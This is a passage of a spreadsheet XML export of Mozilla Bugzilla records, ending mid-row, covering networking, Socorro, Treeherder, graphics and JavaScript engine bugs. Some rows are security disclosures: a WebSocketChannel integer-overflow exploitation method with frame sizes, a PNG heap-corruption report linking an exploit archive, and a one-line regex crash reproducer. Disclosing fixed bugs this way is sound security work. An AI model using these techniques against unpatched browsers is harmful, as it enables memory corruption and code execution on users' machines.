          <t>Integer overflow and memory corruption in WebSocketChannel</t>
        </is>
      </c>
      <c r="D5507" t="inlineStr">
        <is>
          <t>2024-05-30 09:19:22 -0700</t>
        </is>
      </c>
      <c r="E5507" t="n">
        <v>1</v>
      </c>
      <c r="F5507" t="n">
        <v>1</v>
      </c>
      <c r="G5507" t="n">
        <v>3</v>
      </c>
      <c r="H5507" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5507" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5507" t="inlineStr">
        <is>
          <t>Networking: WebSockets</t>
        </is>
      </c>
      <c r="K5507" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L5507" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5507" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5507" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5507" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5507" t="inlineStr">
        <is>
          <t>[necko-active][adv-main48+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q5507" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5507" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5507" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T5507" t="n">
        <v>1</v>
      </c>
      <c r="U5507" t="n">
        <v>0</v>
      </c>
      <c r="V5507" t="n">
        <v>22</v>
      </c>
      <c r="W5507" t="inlineStr">
        <is>
          <t>Created attachment 8771665
Proof of Concept code
From WebSocketChannel::ProcessInput
    if (payloadLength64 + mFragmentAccumulator &gt; mMaxMessageSize) {
      return NS_ERROR_FILE_TOO_BIG;
    }
|payloadLength64| is taken from the incoming websocket frame, and thus attacker controlled, while |mFragmentAccumulator| is the total size of all previous fragments belonging to the current message. The check tries to ensure that no incoming message is ever larger than |kMaxMessageSize|, which itself is at most INT32_MAX. However, The check is incorrect due to the types of the operands:
    int64_t  payloadLength64
    uint32_t mFragmentAccumulator;
    int32_t  mMaxMessageSize;
According to the arithmetic conversion rules [1], |mFragmentAccumulator| and |kMaxMessageSize| will be converted to int64_t before the comparison. As such the comparison is signed and will evaluate to false if the sum becomes negative. This can be achieved as follows:
    1. Send a websocket fragment of size X (where X is less than |kMaxMessageSize|)
    2. Send a second websocket fragment of size 0x7fffffffffffffff
The sum will then become negative and the check fails.
What happens then?
    uint32_t payloadLength = static_cast&lt;uint32_t&gt;(payloadLength64);
    if (avail &lt; payloadLength)
      break;
|payloadLength| will be 0xffffffff and so ProcessInput will defer processing of the message until this many bytes have been received. Incoming data is thus buffered internally until a whole message has been received. WebSocketChannel::UpdateReadBuffer does this. Let's see what happens there:
    } else {
        // existing buffer is not sufficient, extend it
        mBufferSize += count + 8192 + mBufferSize/3;
        LOG(("WebSocketChannel: update read buffer extended to %u\n", mBufferSize));
        uint8_t *old = mBuffer;
        mBuffer = (uint8_t *)realloc(mBuffer, mBufferSize);
        if (!mBuffer) {
          mBuffer = old;
          return false;
        }
        mFramePtr = mBuffer + (mFramePtr - old);
      }
      ::memcpy(mBuffer + mBuffered, buffer, count);
The buffer will be resized multiple times. However, at some point 'count + 8192 + mBufferSize/3' will overflow, resulting in realloc actually shrinking the array. The following memcpy will then write controlled data at a known offset from the new buffer.
Attached is an html file and a python script. The html file sets up the websocket connection while the python script implements a simple websocket server and sends the malicious frames once a client is connected. To reproduce: start the python script on localhost and open websocket.html via file://. The python script should start printing progress information and at some point the browser will crash.
The backtrace at the time of the crash:
Process 75634 stopped
* thread #8: tid = 0x206a90, 0x00007fff882ed01c libsystem_platform.dylib`_platform_memmove$VARIANT$Haswell + 252, name = 'Socket Thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x26d51700a)
    frame #0: 0x00007fff882ed01c libsystem_platform.dylib`_platform_memmove$VARIANT$Haswell + 252
libsystem_platform.dylib`_platform_memmove$VARIANT$Haswell:
-&gt;  0x7fff882ed01c &lt;+252&gt;: vmovups ymmword ptr [rax], ymm0
    0x7fff882ed020 &lt;+256&gt;: vmovups ymm2, ymmword ptr [rsi + 0x20]
    0x7fff882ed025 &lt;+261&gt;: add    rsi, 0x40
    0x7fff882ed029 &lt;+265&gt;: sub    rdx, 0x80
(lldb) bt
* thread #8: tid = 0x206a90, 0x00007fff882ed01c libsystem_platform.dylib`_platform_memmove$VARIANT$Haswell + 252, name = 'Socket Thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x26d51700a)
  * frame #0: 0x00007fff882ed01c libsystem_platform.dylib`_platform_memmove$VARIANT$Haswell + 252
    frame #1: 0x0000000102f91eb8 XUL`mozilla::net::WebSocketChannel::UpdateReadBuffer(this=0x00000001217c3000, buffer="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 count=2048, accumulatedFragments=1024, available=0x000070000029ee0c) + 1096 at WebSocketChannel.cpp:1481
    frame #2: 0x0000000102f92088 XUL`mozilla::net::WebSocketChannel::ProcessInput(this=0x00000001217c3000, buffer="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 count=2048) + 360 at WebSocketChannel.cpp:1512
    frame #3: 0x0000000102fa06b2 XUL`mozilla::net::WebSocketChannel::OnInputStreamReady(this=0x00000001217c3000, aStream=0x0000000122ee5630) + 898 at WebSocketChannel.cpp:3937
    frame #4: 0x00000001027c6489 XUL`nsInputStreamReadyEvent::Run(this=0x000000011a713880) + 137 at nsStreamUtils.cpp:95
    frame #5: 0x00000001027fabeb XUL`nsThread::ProcessNextEvent(this=0x0000000100719100, aMayWait=true, aResult=0x000070000029f88e) + 1211 at nsThread.cpp:1067
    frame #6: 0x0000000102885e4c XUL`NS_ProcessNextEvent(aThread=0x0000000100719100, aMayWait=true) + 140 at nsThreadUtils.cpp:290
    frame #7: 0x00000001029e8a74 XUL`mozilla::net::nsSocketTransportService::Run(this=0x0000000100719000) + 1572 at nsSocketTransportService2.cpp:911
    frame #8: 0x00000001027fabeb XUL`nsThread::ProcessNextEvent(this=0x0000000100719100, aMayWait=false, aResult=0x000070000029fbfe) + 1211 at nsThread.cpp:1067
    frame #9: 0x0000000102885e4c XUL`NS_ProcessNextEvent(aThread=0x0000000100719100, aMayWait=false) + 140 at nsThreadUtils.cpp:290
    frame #10: 0x00000001031f7c86 XUL`mozilla::ipc::MessagePumpForNonMainThreads::Run(this=0x000000011a82b5c0, aDelegate=0x000000010072b460) + 646 at MessagePump.cpp:354
    frame #11: 0x00000001030f4f15 XUL`MessageLoop::RunInternal(this=0x000000010072b460) + 117 at message_loop.cc:235
    frame #12: 0x00000001030f4e75 XUL`MessageLoop::RunHandler(this=0x000000010072b460) + 21 at message_loop.cc:228
    frame #13: 0x00000001030f4e1d XUL`MessageLoop::Run(this=0x000000010072b460) + 45 at message_loop.cc:208
    frame #14: 0x00000001027f8538 XUL`nsThread::ThreadFunc(aArg=0x0000000100719100) + 472 at nsThread.cpp:467
    frame #15: 0x000000010235692d libnss3.dylib`_pt_root(arg=0x0000000100734eb0) + 429 at ptthread.c:216
    frame #16: 0x00007fff894cf99d libsystem_pthread.dylib`_pthread_body + 131
    frame #17: 0x00007fff894cf91a libsystem_pthread.dylib`_pthread_start + 168
    frame #18: 0x00007fff894cd351 libsystem_pthread.dylib`thread_start + 13
[1] http://en.cppreference.com/w/c/language/conversion#Usual_arithmetic_conversions</t>
        </is>
      </c>
      <c r="X5507" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5508">
      <c r="A5508" t="n">
        <v>1146956</v>
      </c>
      <c r="B5508" t="inlineStr">
        <is>
          <t>2015-03-24 08:41:56 -0700</t>
        </is>
      </c>
      <c r="C5508" t="inlineStr">
        <is>
          <t>Datetime format should be self-evident, not lossy</t>
        </is>
      </c>
      <c r="D5508" t="inlineStr">
        <is>
          <t>2019-02-11 08:15:52 -0800</t>
        </is>
      </c>
      <c r="E5508" t="n">
        <v>1</v>
      </c>
      <c r="F5508" t="n">
        <v>1</v>
      </c>
      <c r="G5508" t="n">
        <v>4</v>
      </c>
      <c r="H5508" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5508" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5508" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5508" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5508" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5508" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5508" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5508" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5508" t="inlineStr"/>
      <c r="Q5508" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5508" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5508" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5508" t="n">
        <v>1</v>
      </c>
      <c r="U5508" t="n">
        <v>0</v>
      </c>
      <c r="V5508" t="n">
        <v>12</v>
      </c>
      <c r="W5508" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 5.1; rv:39.0) Gecko/20100101 Firefox/39.0
Build ID: 20150323030203
Steps to reproduce:
Webapp? That's a website, not a webapp, right?
Now to the main point:
Looking through my own reports I had trouble interpreting the date-times presented.
See
https://crash-stats.mozilla.com/report/index/e7bbebd0-8536-4f33-b51f-5608e2150324
Actual results:
Date Processed	2015-03-24 15:02:18.034930
Uptime	16113
Last Crash	32610 seconds before submission
Install Age 	18118 since version was first installed.
Install Time 	2015-03-23 14:57:41
Expected results:
The formatting presented is lossy, aside from a small hint in the footer, stating "All dates are UTC".
This doubt for first-time visitors missing the context information in the footer could be removed with one extra character by using JSON format.
The current format is not parsable for a reason:
new Date('2015-03-23 14:57:41')
Invalid Date
While 2015-03-23T14:57:41Z may be a little less readable for humans, it is an exact representation and parsable:
new Date('2015-03-23T14:57:41Z')
Date 2015-03-23T14:57:41.000Z
Not a bad choice for a site focusing on data analysis.</t>
        </is>
      </c>
      <c r="X5508" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5509">
      <c r="A5509" t="n">
        <v>1303767</v>
      </c>
      <c r="B5509" t="inlineStr">
        <is>
          <t>2016-09-19 09:00:28 -0700</t>
        </is>
      </c>
      <c r="C5509" t="inlineStr">
        <is>
          <t>Use consistent MySQL collation/charset across all environments (utf8_bin)</t>
        </is>
      </c>
      <c r="D5509" t="inlineStr">
        <is>
          <t>2017-02-02 09:55:47 -0800</t>
        </is>
      </c>
      <c r="E5509" t="n">
        <v>1</v>
      </c>
      <c r="F5509" t="n">
        <v>1</v>
      </c>
      <c r="G5509" t="n">
        <v>7</v>
      </c>
      <c r="H5509" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5509" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5509" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5509" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5509" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5509" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5509" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5509" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5509" t="inlineStr"/>
      <c r="Q5509" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5509" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5509" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5509" t="n">
        <v>1</v>
      </c>
      <c r="U5509" t="n">
        <v>0</v>
      </c>
      <c r="V5509" t="n">
        <v>8</v>
      </c>
      <c r="W5509" t="inlineStr">
        <is>
          <t>The collation/charset varies between environments (see bug 1303763), so we should try and make them consistent.
Django doesn't let us set a collation:
https://docs.djangoproject.com/en/1.8/ref/databases/#collation-settings
...so the best solution instead is presumably to use a server default collation.
I think a default is set for SCL3, but not Vagrant/Heroku.
Cameron - I believe you've looked into this in the past, could you suggest the best way forwards, looking at the diffs in the parent bug? Some of the differences may in fact be from the last round of experimentation with charset/collation changes. Thanks!</t>
        </is>
      </c>
      <c r="X5509" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5510">
      <c r="A5510" t="n">
        <v>157202</v>
      </c>
      <c r="B5510" t="inlineStr">
        <is>
          <t>2002-07-12 13:37:05 -0700</t>
        </is>
      </c>
      <c r="C5510" t="inlineStr">
        <is>
          <t>Exploitable (?) heap overrun in PNG</t>
        </is>
      </c>
      <c r="D5510" t="inlineStr">
        <is>
          <t>2002-09-10 15:40:39 -0700</t>
        </is>
      </c>
      <c r="E5510" t="n">
        <v>1</v>
      </c>
      <c r="F5510" t="n">
        <v>1</v>
      </c>
      <c r="G5510" t="n">
        <v>3</v>
      </c>
      <c r="H5510" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5510" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5510" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5510" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5510" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5510" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5510" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5510" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5510" t="inlineStr">
        <is>
          <t>[adt1 rtm] [ETA 07/23]</t>
        </is>
      </c>
      <c r="Q5510" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5510" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5510" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T5510" t="n">
        <v>1</v>
      </c>
      <c r="U5510" t="n">
        <v>0</v>
      </c>
      <c r="V5510" t="n">
        <v>47</v>
      </c>
      <c r="W5510" t="inlineStr">
        <is>
          <t>Subject:
exploitable heap corruption via PNG Alpha data
From:
zen-parse &lt;zen-parse@gmx.net&gt;
Date:
Sat, 13 Jul 2002 04:04:56 +1200 (NZST)
This problem allows execution of arbitrary code via Netscape 6.2.3.
Product: 			Netscape 6.x
Platform: 			Unix: x86 Linux
Operating system version: 	Redhat 7.0
exploitable heap corruption via PNG Alpha data 
I believe the fault lies somewhere around here:
http://lxr.mozilla.org/mozilla/source/gfx2/src/gfxImageFrame.cpp#326
A specially crafted invalid PNG, with reported dimensions of 65536x65536
such as and an 8-bit alpha channel (most likely, similar overflowing
values as well, such as 65531x32771 with 16-bit alpha, if that is
supported),can cause controllable heap corruption, overwriting (at least)
a pointer to a function pointer that allows arbitary code to be executed.
An example exploit for this is on:
http://crash.ihug.co.nz/~Sneuro/pngkiller2.tar.gz
The code is somewhat commented and explains what I believe is happening,
although it was written while offline, and so without access to the source
to verify the accuracy.
However, this is a DIFFERENT problem to the previously reported PNG
problem.</t>
        </is>
      </c>
      <c r="X5510" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5511">
      <c r="A5511" t="n">
        <v>552002</v>
      </c>
      <c r="B5511" t="inlineStr">
        <is>
          <t>2010-03-12 10:57:51 -0800</t>
        </is>
      </c>
      <c r="C5511" t="inlineStr">
        <is>
          <t>Crash in  [@ nsDOMEvent::QueryInterface(nsID const&amp;, void**) ]</t>
        </is>
      </c>
      <c r="D5511" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5511" t="n">
        <v>1</v>
      </c>
      <c r="F5511" t="n">
        <v>1</v>
      </c>
      <c r="G5511" t="n">
        <v>6</v>
      </c>
      <c r="H5511" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5511" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5511" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5511" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L5511" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5511" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5511" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5511" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5511" t="inlineStr">
        <is>
          <t>[sg:critical?][to be fixed by asynchronous plugin painting][qa?]</t>
        </is>
      </c>
      <c r="Q5511" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5511" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5511" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5511" t="n">
        <v>1</v>
      </c>
      <c r="U5511" t="n">
        <v>0</v>
      </c>
      <c r="V5511" t="n">
        <v>33</v>
      </c>
      <c r="W5511" t="inlineStr">
        <is>
          <t>Seen while reviewing crash data and 100% reproducible on the site in the URL using Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.3a3pre) Gecko/20100312 Minefield/3.7a3pre
STR:
1. Load site in URL
2. Perform and right click event and then scroll. Crash.
https://crash-stats.mozilla.com/report/index/36fa4e87-e61f-42cc-abce-b6cc92100312
https://crash-stats.mozilla.com/report/index/762c0b32-8f02-4c28-9f83-ac3852100312
https://crash-stats.mozilla.com/report/index/bp-85a1d79c-5fb1-4364-9e00-b14092100312
are my three crash reports and my flash version is below.
    File: Flash Player.plugin
    Version: 10.1.51.95
    Shockwave Flash 10.1 d51</t>
        </is>
      </c>
      <c r="X5511" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5512">
      <c r="A5512" t="n">
        <v>890432</v>
      </c>
      <c r="B5512" t="inlineStr">
        <is>
          <t>2013-07-04 20:35:50 -0700</t>
        </is>
      </c>
      <c r="C5512" t="inlineStr">
        <is>
          <t>WebGL conformance-test-suite crash with long-expressions-should-not-crash [@glpCGNode]</t>
        </is>
      </c>
      <c r="D5512" t="inlineStr">
        <is>
          <t>2014-01-31 03:20:50 -0800</t>
        </is>
      </c>
      <c r="E5512" t="n">
        <v>1</v>
      </c>
      <c r="F5512" t="n">
        <v>1</v>
      </c>
      <c r="G5512" t="n">
        <v>3</v>
      </c>
      <c r="H5512" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5512" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5512" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5512" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5512" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5512" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5512" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5512" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5512" t="inlineStr">
        <is>
          <t>[adv-main26+]</t>
        </is>
      </c>
      <c r="Q5512" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5512" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5512" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T5512" t="n">
        <v>1</v>
      </c>
      <c r="U5512" t="n">
        <v>0</v>
      </c>
      <c r="V5512" t="n">
        <v>25</v>
      </c>
      <c r="W5512" t="inlineStr">
        <is>
          <t>Testcase: https://www.khronos.org/registry/webgl/sdk/tests/conformance/glsl/bugs/long-expressions-should-not-crash.html
Stack:
#0  0x00000001256ee609 in glpCGNode ()
#1  0x00000001256f03ad in glpCGPPStreamOpNode ()
#2  0x00000001256eff8f in glpCGNode ()
#3  0x00000001256f03ad in glpCGPPStreamOpNode ()
#4  0x00000001256eff8f in glpCGNode ()
[...]
#4403 0x00000001256f03ad in glpCGPPStreamOpNode ()
#4404 0x00000001256eff8f in glpCGNode ()
#4405 0x00000001256f03ad in glpCGPPStreamOpNode ()
#4406 0x00000001256eff8f in glpCGNode ()
#4407 0x00000001256f03ad in glpCGPPStreamOpNode ()
[...]
Tested with http://hg.mozilla.org/integration/mozilla-inbound/rev/a9d6d86a8090
Firefox 22 is also affected.
  Chipset Model: NVIDIA GeForce GT 650M
  Type: GPU
  Bus: PCIe
  PCIe Lane Width: x8
  VRAM (Total):	1024 MB
  Vendor: NVIDIA (0x10de)
  Device ID: 0x0fd5
  Revision ID: 0x00a2
  ROM Revision: 3688
  gMux Version: 3.2.19 [3.2.8]
ProductName:	Mac OS X
ProductVersion:	10.8.4
BuildVersion:	12E55</t>
        </is>
      </c>
      <c r="X5512" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5513">
      <c r="A5513" t="n">
        <v>1605806</v>
      </c>
      <c r="B5513" t="inlineStr">
        <is>
          <t>2019-12-23 16:51:24 -0800</t>
        </is>
      </c>
      <c r="C5513" t="inlineStr">
        <is>
          <t>adjust language on "memory dump access" page</t>
        </is>
      </c>
      <c r="D5513" t="inlineStr">
        <is>
          <t>2020-01-09 15:03:46 -0800</t>
        </is>
      </c>
      <c r="E5513" t="n">
        <v>1</v>
      </c>
      <c r="F5513" t="n">
        <v>1</v>
      </c>
      <c r="G5513" t="n">
        <v>4</v>
      </c>
      <c r="H5513" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5513" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5513" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5513" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5513" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5513" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5513" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5513" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5513" t="inlineStr"/>
      <c r="Q5513" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5513" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5513" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5513" t="n">
        <v>1</v>
      </c>
      <c r="U5513" t="n">
        <v>0</v>
      </c>
      <c r="V5513" t="n">
        <v>4</v>
      </c>
      <c r="W5513" t="inlineStr">
        <is>
          <t>Crash Stats has a page in the documentation covering memory dump access:
https://crash-stats.mozilla.com/documentation/memory_dump_access/
When we wrote that page, the prevailing use case was "I'm an engineer and I need access to minidumps". That was a while ago. Since then, a bunch of things have changed and there are other use cases such as "I want access to comments" and "I want access to *[insert pii field here]*".
This bug covers generalizing the language on that page (but not the agreement) so it's clear that it covers all PII fields on crash stats and not just memory dumps.</t>
        </is>
      </c>
      <c r="X5513" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5514">
      <c r="A5514" t="n">
        <v>653672</v>
      </c>
      <c r="B5514" t="inlineStr">
        <is>
          <t>2011-04-29 01:37:24 -0700</t>
        </is>
      </c>
      <c r="C5514" t="inlineStr">
        <is>
          <t>Reproducible crash at js::RegExp::executeInternal</t>
        </is>
      </c>
      <c r="D5514" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:26 -0700</t>
        </is>
      </c>
      <c r="E5514" t="n">
        <v>1</v>
      </c>
      <c r="F5514" t="n">
        <v>1</v>
      </c>
      <c r="G5514" t="n">
        <v>3</v>
      </c>
      <c r="H5514" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5514" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5514" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5514" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5514" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5514" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5514" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5514" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5514" t="inlineStr">
        <is>
          <t>[sg:critical?] don't unhide until Apple's release [fixed-in-tracemonkey][qa!]</t>
        </is>
      </c>
      <c r="Q5514" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5514" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5514" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T5514" t="n">
        <v>1</v>
      </c>
      <c r="U5514" t="n">
        <v>0</v>
      </c>
      <c r="V5514" t="n">
        <v>27</v>
      </c>
      <c r="W5514" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
The crash looks like:
Program received signal SIGSEGV, Segmentation fault.
0x00007fffe5d60967 in ?? ()
(gdb) x/i $rip
0x7fffe5d60967: cmpw   $0xd,-0x4(%rdi,%rsi,2)
(gdb) p $rdi
$1 = 140736947844760
(gdb) p $rsi
$2 = 2147483650
and the values varied while the testcase was being minimized.
Reproducible: Always
Steps to Reproduce:
1. $ echo '&lt;script&gt; "".match(/(?:(?=g))|(?:m).{2147483648,}/); &lt;/script&gt;' &gt; rex.html
2. ...
3. $ firefox rex.html
Actual Results:  
Firefox crashes.
Expected Results:  
Firefox remains running.
Bug https://bugzilla.mozilla.org/show_bug.cgi?id=605998 sounds similar to this one, but since this is cleanly reproducible and looks potentially exploitable to me, filing this separately as a hidden bug to be on the safe side.
Crash state dump at https://crash-stats.mozilla.com/report/index/140f49fb-e689-48ff-88b8-131f22110429</t>
        </is>
      </c>
      <c r="X5514" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5515">
      <c r="A5515" t="n">
        <v>861234</v>
      </c>
      <c r="B5515" t="inlineStr">
        <is>
          <t>2013-04-12 09:31:03 -0700</t>
        </is>
      </c>
      <c r="C5515" t="inlineStr">
        <is>
          <t>[traceback] OSError: [Errno 17] File exists - Blank images in review queue</t>
        </is>
      </c>
      <c r="D5515" t="inlineStr">
        <is>
          <t>2016-02-04 14:47:12 -0800</t>
        </is>
      </c>
      <c r="E5515" t="n">
        <v>1</v>
      </c>
      <c r="F5515" t="n">
        <v>1</v>
      </c>
      <c r="G5515" t="n">
        <v>6</v>
      </c>
      <c r="H5515" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5515" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J5515" t="inlineStr">
        <is>
          <t>Admin/Editor Tools</t>
        </is>
      </c>
      <c r="K5515" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5515" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5515" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5515" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5515" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5515" t="inlineStr"/>
      <c r="Q5515" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5515" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5515" t="inlineStr">
        <is>
          <t>2013-04-25</t>
        </is>
      </c>
      <c r="T5515" t="n">
        <v>1</v>
      </c>
      <c r="U5515" t="n">
        <v>0</v>
      </c>
      <c r="V5515" t="n">
        <v>22</v>
      </c>
      <c r="W5515" t="inlineStr">
        <is>
          <t>http://i.imgur.com/AppHumC.png
I've been flagging them as I'm seeing them: https://marketplace.firefox.com/reviewers/themes/queue/flagged
Not sure what happens if they're approved, I'm erring on the side of caution...</t>
        </is>
      </c>
      <c r="X5515" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5516">
      <c r="A5516" t="n">
        <v>739925</v>
      </c>
      <c r="B5516" t="inlineStr">
        <is>
          <t>2012-03-28 03:12:02 -0700</t>
        </is>
      </c>
      <c r="C5516" t="inlineStr">
        <is>
          <t>OTS off-by-one may result in arbitrary code execution</t>
        </is>
      </c>
      <c r="D5516" t="inlineStr">
        <is>
          <t>2012-05-18 13:26:19 -0700</t>
        </is>
      </c>
      <c r="E5516" t="n">
        <v>1</v>
      </c>
      <c r="F5516" t="n">
        <v>1</v>
      </c>
      <c r="G5516" t="n">
        <v>2</v>
      </c>
      <c r="H5516" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
